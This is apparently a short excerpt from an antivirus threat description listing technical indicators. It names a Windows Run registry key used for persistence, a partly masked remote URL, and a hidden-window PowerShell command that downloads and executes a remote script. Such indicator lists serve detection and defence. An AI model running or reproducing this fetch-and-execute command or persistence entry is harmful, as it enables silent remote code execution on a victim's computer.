Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'YSYSTEM' = '<Full path to file>'
- http://m2###.#yq-see.com:200/a
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://m2###.#yq-see.com:200/a'))' (with hidden window)